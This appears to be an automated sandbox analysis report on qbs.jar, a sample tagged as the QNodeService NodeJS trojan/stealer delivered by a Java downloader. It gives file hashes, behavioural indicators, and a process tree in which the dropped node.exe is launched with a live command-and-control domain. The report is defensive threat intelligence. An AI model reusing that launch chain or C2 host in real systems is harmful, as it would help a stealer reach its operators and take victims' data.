qnodeservice | 6b9c4f7252046dbdc98d8eb537bdc776b1e35040b86c1dc1927c2e6bdd7e6c0d

Analysis

Target

qbs.jar
Size

68KB
MD5

eeb9a3c4cc1fd0e95ff4184a50eb49d9
SHA1

8445135ef24533a22270fd15d9a9e767c43168e6
SHA256

6b9c4f7252046dbdc98d8eb537bdc776b1e35040b86c1dc1927c2e6bdd7e6c0d
SHA512

8533d4d2ef1fbcf7df5c452f613606df19a6271a54c4114809c3dfb21a0900e9d58474ba39da63b4bbd7aec4ed15279b81a3fcf538560e8e6bcc92781866ebcd

Score

10^/10

QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
trojan qnodeservice

Executes dropped EXE 1 IoCs

pid	Process
3596	node.exe

JavaScript code in executable 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001ad8b-172.dat	js

Suspicious behavior: EnumeratesProcesses 4 IoCs

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 3840 wrote to memory of 2504	3840	java.exe	74
PID 3840 wrote to memory of 2504	3840	java.exe	74
PID 2504 wrote to memory of 3596	2504	javaw.exe	78
PID 2504 wrote to memory of 3596	2504	javaw.exe	78

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\qbs.jar
1⤵
- Suspicious use of WriteProcessMemory
PID:3840
- C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
  "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\cf507074.tmp
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2504
- - C:\Users\Admin\node-v14.12.0-win-x64\node.exe
    C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain success87.hopto.org
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:3596

memory/3596-174-0x000000F5124C0000-0x000000F5124C1000-memory.dmp

Filesize
4KB

Download